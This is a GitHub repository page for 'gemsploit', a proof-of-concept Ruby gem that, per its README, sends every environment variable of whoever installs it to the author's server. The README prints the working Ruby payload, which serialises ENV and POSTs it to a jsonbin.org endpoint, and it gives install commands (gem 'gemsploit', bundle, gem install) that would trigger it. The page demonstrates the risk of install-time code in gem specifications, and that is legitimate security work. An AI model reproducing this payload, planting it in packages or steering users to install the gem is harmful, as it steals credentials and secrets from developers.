Skip to content

KevinColemanInc/gemsploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits

assets

assets

 
 

ext/sploit

ext/sploit

 
 

lib

lib

 
 

spec

spec

 
 

.gitignore

.gitignore

 
 

.rspec

.rspec

 
 

.travis.yml

.travis.yml

 
 

Gemfile

Gemfile

 
 

LICENSE.txt

LICENSE.txt

 
 

README.md

README.md

 
 

Rakefile

Rakefile

 
 

gemsploit.gemspec

gemsploit.gemspec

 
 

Repository files navigation

Gemsploit

Screencapture of ENV passwords

Proof of concept for ruby bundler exploit. When this gem is installed, it posts all of your ENV files to my server.

Any gem you install gets full access to your message (per the account bundler install was run as). This includes read access to ~/.ssh, your ENV vars, etc.

How it works

When a gem is installed, the code block in the *.gemspec file is executed. This gem contains a malicious payload to post all of your ENV variables to a remote server when the gem is installed ($ bundle or $ gem install gemsploit)

require 'net/http'
require 'uri'
require 'json'
require 'securerandom'

uri = URI.parse("https://jsonbin.org/kevincolemaninc/#{SecureRandom.uuid}")
request = Net::HTTP::Post.new(uri)
request["Authorization"] = "token " # withheld
request.body = JSON.dump(ENV.to_h)

req_options = {
  use_ssl: uri.scheme == "https",
}

response = Net::HTTP.start(uri.hostname, uri.port, req_options) do |http|
  http.request(request)
end
response.body

Installation

Add this line to your application's Gemfile:

gem 'gemsploit'

Usage

Execute:

$ bundle

Or install it yourself as:

$ gem install gemsploit

About

No description, website, or topics provided.

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages